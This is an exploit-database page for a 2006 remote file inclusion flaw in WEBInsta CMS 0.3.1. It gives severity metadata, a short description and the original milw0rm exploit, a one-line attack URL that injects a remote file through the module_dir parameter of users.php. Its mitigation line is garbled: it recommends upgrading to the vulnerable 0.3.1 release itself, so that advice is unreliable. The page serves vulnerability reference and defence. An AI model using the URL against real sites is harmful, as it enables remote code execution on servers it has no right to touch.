header-logo
Suggest Exploit
vendor:
WEBInsta. CMS
by:
Yns
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: WEBInsta. CMS
Affected Version From: 0.3.1
Affected Version To: 0.3.1
Patch Exists: YES
Related CWE: N/A
CPE: a:webinsta:webinsta_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WEBInsta. CMS 0.3.1 Remote File Include Vulnerability

A vulnerability in WEBInsta. CMS 0.3.1 allows remote attackers to include arbitrary files via a URL in the module_dir parameter to modules/usersonline/users.php.

Mitigation:

Upgrade to the latest version of WEBInsta. CMS 0.3.1 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

/*
Vulnerable product : http://www.webinsta.com/download.html ( WEBInsta. CMS 0.3.1 )
Author : Yns - yns.zaxaz.com
*/

Exploit:
http://[HOST]/[PATH]/modules/usersonline/users.php?module_dir=[REMOTE_FILE]

# milw0rm.com [2006-08-15]

Navigation

Suggest Exploit

Services By CQR